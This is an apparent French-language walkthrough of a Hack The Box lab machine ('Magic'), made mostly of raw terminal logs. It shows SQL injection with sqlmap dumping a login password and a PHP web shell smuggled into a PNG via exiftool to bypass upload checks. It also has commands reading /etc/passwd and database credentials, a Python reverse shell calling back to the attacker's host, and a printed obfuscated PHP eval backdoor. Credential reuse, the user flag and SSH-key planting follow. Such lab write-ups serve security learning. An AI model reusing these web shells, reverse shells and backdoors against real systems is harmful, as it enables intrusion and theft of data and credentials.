1. User
root@Host-001:~# nmap -sC -sV 10.10.10.185
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-30 11:23 CEST
Nmap scan report for 10.10.10.185
Host is up (0.088s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
| 256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_ 256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.35 seconds
root@Host-001:~#
Dirb:
root@Host-001:~# dirb http://10.10.10.185
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Apr 30 11:24:28 2020
URL_BASE: http://10.10.10.185/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.10.185/ ----
==> DIRECTORY: http://10.10.10.185/assets/
==> DIRECTORY: http://10.10.10.185/images/
+ http://10.10.10.185/index.php (CODE:200|SIZE:4589)
+ http://10.10.10.185/server-status (CODE:403|SIZE:277)
---- Entering directory: http://10.10.10.185/assets/ ----
==> DIRECTORY: http://10.10.10.185/assets/css/
==> DIRECTORY: http://10.10.10.185/assets/js/
---- Entering directory: http://10.10.10.185/images/ ----
==> DIRECTORY: http://10.10.10.185/images/uploads/
---- Entering directory: http://10.10.10.185/assets/css/ ----
==> DIRECTORY: http://10.10.10.185/assets/css/images/
---- Entering directory: http://10.10.10.185/assets/js/ ----
^C> Testing: http://10.10.10.185/assets/js/errordocs
root@Host-001:~#
Page d’accueil http port 80 en bas: Please login to upload
Lien:
http://10.10.10.185/login.php
Username et Password classique. On intercepte la requête avec Burp on essaye du verb tampering HACK et GET sans succès on lance sqlmap. Voir HTTP Verb Tampering
root@Host-001:~/Bureau/htb/magic# sqlmap -r sqlmap_post.txt --risk=3
___
__H__
___ ___[.]_____ ___ ___ {1.4.3#stable}
|_ -| . [.] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 11:43:47 /2020-04-30/
[11:43:47] [INFO] parsing HTTP request from 'sqlmap_post.txt'
[11:43:47] [INFO] testing connection to the target URL
[11:43:48] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:43:48] [INFO] testing if the target URL content is stable
[11:43:48] [INFO] target URL content is stable
[11:43:48] [INFO] testing if POST parameter 'username' is dynamic
[11:43:49] [WARNING] POST parameter 'username' does not appear to be dynamic
[11:43:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[11:43:49] [INFO] testing for SQL injection on POST parameter 'username'
[11:43:49] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:43:50] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[11:43:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:43:51] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:52] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:43:53] [INFO] testing 'PostgreSQL OR error-based - WHERE or HAVING clause'
[11:43:54] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[11:43:54] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[11:43:55] [INFO] testing 'Oracle OR error-based - WHERE or HAVING clause (XMLType)'
[11:43:55] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:43:55] [INFO] testing 'Generic inline queries'
[11:43:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:43:56] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[11:43:56] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[11:43:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:43:57] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:43:57] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:43:58] [INFO] testing 'PostgreSQL > 8.1 OR time-based blind'
[11:43:58] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
[11:43:59] [INFO] testing 'Oracle AND time-based blind'
[11:43:59] [INFO] testing 'Oracle OR time-based blind'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] y
[11:45:10] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[11:45:10] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:45:10] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
[11:45:11] [WARNING] POST parameter 'username' does not seem to be injectable
[11:45:11] [INFO] testing if POST parameter 'password' is dynamic
[11:45:11] [WARNING] POST parameter 'password' does not appear to be dynamic
[11:45:12] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
[11:45:12] [INFO] testing for SQL injection on POST parameter 'password'
[11:45:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:45:13] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
got a 302 redirect to 'http://10.10.10.185:80/upload.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] n
[11:45:46] [INFO] POST parameter 'password' appears to be 'OR boolean-based blind - WHERE or HAVING clause' injectable (with --code=302)
[11:45:48] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) value? [Y/n] y
[11:46:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[11:46:10] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[11:46:11] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[11:46:11] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[11:46:11] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:46:11] [INFO] testing 'MySQL >= 5.1 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[11:46:11] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:46:11] [INFO] testing 'MySQL >= 4.1 OR error-based - WHERE or HAVING clause (FLOOR)'
[11:46:12] [INFO] testing 'MySQL OR error-based - WHERE or HAVING clause (FLOOR)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)'
[11:46:12] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (EXP)'
[11:46:12] [INFO] testing 'MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)'
[11:46:12] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)'
[11:46:12] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)'
[11:46:12] [INFO] testing 'Generic inline queries'
[11:46:12] [INFO] testing 'MySQL inline queries'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:46:12] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:46:12] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[11:46:13] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL >= 5.0.12 OR time-based blind (query SLEEP - comment)'
[11:46:13] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - comment)'
[11:46:14] [INFO] testing 'MySQL < 5.0.12 OR time-based blind (heavy query - comment)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (comment)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP)'
[11:46:14] [INFO] testing 'MySQL >= 5.0.12 RLIKE time-based blind (query SLEEP - comment)'
[11:46:14] [INFO] testing 'MySQL AND time-based blind (ELT)'
[11:46:14] [INFO] testing 'MySQL OR time-based blind (ELT)'
[11:46:14] [INFO] testing 'MySQL AND time-based blind (ELT - comment)'
[11:46:15] [INFO] testing 'MySQL OR time-based blind (ELT - comment)'
[11:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:15] [INFO] testing 'MySQL >= 5.1 time-based blind (heavy query - comment) - PROCEDURE ANALYSE (EXTRACTVALUE)'
[11:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace'
[11:46:15] [INFO] testing 'MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)'
[11:46:15] [INFO] testing 'MySQL < 5.0.12 time-based blind - Parameter replace (heavy queries)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (bool)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (ELT)'
[11:46:15] [INFO] testing 'MySQL time-based blind - Parameter replace (MAKE_SET)'
[11:46:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:46:15] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:46:15] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[11:46:16] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[11:46:18] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[11:46:20] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[11:46:22] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[11:46:24] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[11:46:27] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[11:46:29] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[11:46:31] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
[11:46:33] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
[11:46:33] [INFO] checking if the injection point on POST parameter 'password' is a false positive
POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 376 HTTP(s) requests:
---
Parameter: password (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: username=test&password=-1376' OR 2751=2751 AND 'AhSJ'='AhSJ
---
[11:54:43] [INFO] testing MySQL
[11:54:43] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[11:54:43] [INFO] confirming MySQL
[11:54:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[11:54:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.185'
[*] ending @ 11:54:44 /2020-04-30/
root@Host-001:~/Bureau/htb/magic#
selon sqlmap il y une redirection vers http://10.10.10.185/upload.php
On dump avec –dump-all dans mysql:
root@Host-001:~/Bureau/htb/magic# sqlmap -r sqlmap_post.txt --risk=3 --dump-all
(...)
[12:27:18] [INFO] resumed: Th3s3usW4sK1ng
[12:27:18] [INFO] resumed: admin
Database: Magic
Table: login
[1 entry]
+------+----------+----------------+
| id | username | password |
+------+----------+----------------+
| 1 | admin | Th3s3usW4sK1ng |
+------+----------+----------------+
[12:27:18] [INFO] table 'Magic.login' dumped to CSV file '/root/.sqlmap/output/10.10.10.185/dump/Magic/login.csv'
On consulte la page et on a bypassé la page de login…
Shell.php passe pas, seulement jpg et png
On essaie shell.php.png mais message ‘What are you trying to do there?’
On essaye avec exiftool:
root@Host-001:~/Bureau# exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' blank.png
root@Host-001:~/Bureau# mv blank.png blank.php.png
The file blank.php.png has been uploaded.
http://10.10.10.185/images/uploads/blank.php.png?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
http://10.10.10.185/images/uploads/blank.php.png?cmd=pwd
/var/www/Magic/images/uploads
http://10.10.10.185/images/uploads/blank.php.png?cmd=ls%20/var/www/Magic
assets
db.php5
id
images
index.php
login.php
logout.php
n30j1.php
upload.php
http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20/var/www/Magic/login.php
setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_OBJ);
$stmt = $pdo->query("SELECT * FROM login WHERE username='$username' AND password='$password'");
$user = $stmt->fetch();
$count = 0;
foreach ($user as $value) {
$count += 1;
}
Database::disconnect();
if ($count > 0) {
$_SESSION['user_id'] = $user->id;
header("Location: upload.php");
} else {
print("");
//print('Wrong Username or Password');
}
} catch (PDOException $e) {
//echo "Error: " . $e->getMessage();
//echo "An SQL Error occurred!";
}
}
}
?>
http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
theseus:x:1000:1000:Theseus,,,:/home/theseus:/bin/bash
sshd:x:123:65534::/run/sshd:/usr/sbin/nologin
mysql:x:122:127:MySQL Server,,,:/nonexistent:/bin/false
http://10.10.10.185/images/uploads/blank.php.png?cmd=ls%20-la%20/home/theseus/
total 84
drwxr-xr-x 15 theseus theseus 4096 Apr 16 02:58 .
drwxr-xr-x 3 root root 4096 Oct 15 2019 ..
-rw------- 1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
lrwxrwxrwx 1 theseus theseus 9 Oct 21 2019 .bash_history -> /dev/null
-rw-r--r-- 1 theseus theseus 220 Oct 15 2019 .bash_logout
-rw-r--r-- 1 theseus theseus 15 Oct 21 2019 .bash_profile
-rw-r--r-- 1 theseus theseus 3771 Oct 15 2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
drwx------ 13 theseus theseus 4096 Oct 22 2019 .config
drwx------ 3 theseus theseus 4096 Oct 21 2019 .gnupg
drwx------ 3 theseus theseus 4096 Oct 21 2019 .local
drwx------ 2 theseus theseus 4096 Apr 30 01:17 .ssh
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Desktop
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Documents
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Downloads
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Music
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Pictures
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Public
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Templates
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Videos
-r-------- 1 theseus theseus 33 Apr 30 00:41 user.txt
view-source:http://10.10.10.185/images/uploads/blank.php.png?cmd=cat%20%20/var/www/Magic/db.php5
class Database
{
private static $dbName = 'Magic' ;
private static $dbHost = 'localhost' ;
private static $dbUsername = 'theseus';
private static $dbUserPassword = 'iamkingtheseus';
private static $cont = null;
public function __construct() {
die('Init function is not allowed');
}
public static function connect()
{
// One connection through whole application
if ( null == self::$cont )
{
try
{
self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
}
catch(PDOException $e)
{
die($e->getMessage());
}
}
return self::$cont;
}
public static function disconnect()
{
self::$cont = null;
}
}
….
Shell stable:
10.10.10.185/images/blank.php.png?cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.10.14.90%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Permet d’avoir un shell stable en écoute sur le port 1234 nc -nlvp 1234
fichier ok.php
<?php
$U='trlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);';
$p='$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_matc';
$='$k="f71dbe52";$kh="628a3f83a77a";$kf="b494817525c6";$p="';
$c='h("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==';
$i='1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(';
$X='$m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@ba';
$S='Cl2ULjIvWvX1ShJM";function x($t,$k){$c=strlen($k);$l=s';
$d='se64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}';
$j=str_replace('','','create_function');
$R=str_replace('','',$.$S.$U.$p.$c.$i.$X.$d);
$z=$j('',$R);$z();
?>
$k="f71dbe52";
$kh="628a3f83a77a";
$kf="b494817525c6";
$p="Cl2ULjIvWvX1ShJM";
function x($t,$k){
$c=strlen($k);
$l=strlen($t);
$o="";
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++){
$o.=$t{$i}^$k{$j};
}
}
return $o;
}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {
@ob_start();
@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();
@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");
}
Donne lambda_1
Pas l’air super utile…
On trouve une super commande pour avoir un vrai shell: /usr/bin/script -qc /bin/bash /dev/null
$ ls -la ok.php
-rw-r--r-- 1 www-data www-data 707 Apr 30 02:39 ok.php
$ su admin
su: must be run from a terminal
$ /usr/bin/script -qc /bin/bash /dev/null
www-data@ubuntu:/var/www/Magic/images$ sudo -l
sudo -l
[sudo] password for www-data: exit
Sorry, try again.
[sudo] password for www-data:
Sorry, try again.
[sudo] password for www-data:
sudo: 3 incorrect password attempts
www-data@ubuntu:/var/www/Magic/images$ su admin
su admin
No passwd entry for user 'admin'
www-data@ubuntu:/var/www/Magic/images$ su theseus
su theseus
Password: iamkingtheseus <-- mdp dans db.php5 ? Nope!
su: Authentication failure
www-data@ubuntu:/var/www/Magic/images$ su theseus
su theseus
Password: Th3s3usW4sK1ng <------- Le mdp de l'admin trouvé dans le dump de mysql...
theseus@ubuntu:/var/www/Magic/images$ id
id
uid=1000(theseus) gid=1000(theseus) groups=1000(theseus),100(users)
theseus@ubuntu:/var/www/Magic/images$ cd /home/theseus
cd /home/theseus
theseus@ubuntu:~$ ls
ls
Desktop Downloads Music Public user.txt
Documents linpeas.sh Pictures Templates Videos
theseus@ubuntu:~$ cat user.txt
cat user.txt
a6ec88cc7fa8f2ec4e81796f27bdac17
theseus@ubuntu:~$
2. Root
theseus@ubuntu:/var/www/Magic/images/uploads$ sudo -l
sudo -l
[sudo] password for theseus: Th3s3usW4sK1ng
Sorry, user theseus may not run sudo on ubuntu.
theseus@ubuntu:/var/www/Magic/images/uploads$ cd /home
cd /home
theseus@ubuntu:/home$ ls
ls
theseus
theseus@ubuntu:/home$ cd theseus
cd theseus
theseus@ubuntu:~$ ls -la
ls -la
total 92
drwxr-xr-x 15 theseus theseus 4096 Aug 1 08:05 .
drwxr-xr-x 3 root root 4096 Oct 15 2019 ..
lrwxrwxrwx 1 theseus theseus 9 Oct 21 2019 .bash_history -> /dev/null
-rw-r--r-- 1 theseus theseus 220 Oct 15 2019 .bash_logout
-rw-r--r-- 1 theseus theseus 15 Oct 21 2019 .bash_profile
-rw-r--r-- 1 theseus theseus 3771 Oct 15 2019 .bashrc
drwxrwxr-x 13 theseus theseus 4096 Mar 13 05:57 .cache
-rwxrwxrwx 1 theseus theseus 0 Aug 1 07:34 cat
-rw-rw-r-- 1 theseus theseus 1024 Aug 1 07:42 .cat.swp
drwx------ 13 theseus theseus 4096 Oct 22 2019 .config
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Desktop
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Documents
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Downloads
-rwxrwxr-x 1 theseus theseus 19 Aug 1 06:47 fdisk
drwx------ 3 theseus theseus 4096 Oct 21 2019 .gnupg
-rw------- 1 theseus theseus 7334 Apr 15 23:50 .ICEauthority
drwx------ 3 theseus theseus 4096 Oct 21 2019 .local
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Music
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Pictures
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Public
drwx------ 2 theseus theseus 4096 Aug 1 09:24 .ssh
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Templates
-r-------- 1 theseus theseus 33 Aug 1 03:19 user.txt
drwxr-xr-x 2 theseus theseus 4096 Oct 22 2019 Videos
theseus@ubuntu:~$ cd .ssh
cd .ssh
theseus@ubuntu:~/.ssh$ ls -la
ls -la
total 12
drwx------ 2 theseus theseus 4096 Aug 1 09:24 .
drwxr-xr-x 15 theseus theseus 4096 Aug 1 08:05 ..
-rw-rw-r-- 1 theseus theseus 563 Aug 1 09:24 authorized_keys
theseus@ubuntu:~/.ssh$
On peut écrire une clé ssh. Voir Authorized-Keys
root@Host-001:~/Bureau/htb/magic# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /root/Bureau/htb/magic/id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/Bureau/htb/magic/id_rsa
Your public key has been saved in /root/Bureau/htb/magic/id_rsa.pub
The key fingerprint is:
SHA256:gJ4mi+myBrKh2dtwmlnjz36PND0W5KzlAFRUlbDOJTg root@Host-001
The key's randomart image is:
+---[RSA 3072]----+
| .oo.oo.. |
| o . .. |
| . o E + . |
| . . o B o |
| . + S B |
|+o + * . |
|*=o + + = |
|*..X o ..+ . |
|+o=.oo+.... |
+----[SHA256]-----+
root@Host-001:~/Bureau/htb/magic# ls -la
total 104
drwxr-xr-x 2 root root 4096 août 2 10:23 .
drwxr-xr-x 14 root root 4096 août 1 09:50 ..
-rw-r--r-- 1 root root 6008 avril 30 13:31 blank2.php.png
-rw-r--r-- 1 root root 5914 avril 30 12:00 blank2.png_original
-rw-r--r-- 1 root root 5976 avril 30 12:00 blank.php.png
-rw------- 1 root root 2602 août 2 10:23 id_rsa
-rw-r--r-- 1 root root 567 août 2 10:23 id_rsa.pub
-rw-r--r-- 1 root root 24609 avril 30 17:51 magic
-rw-r--r-- 1 root root 20480 août 2 10:21 .magic.swp
-rwx------ 1 root root 5493 avril 30 13:20 php-reverse-shell.php
-rw-r--r-- 1 root root 30 avril 30 11:57 shell.php.png
-rw-r--r-- 1 root root 487 avril 30 11:42 sqlmap_post.txt
root@Host-001:~/Bureau/htb/magic# cat id_rsa.pub
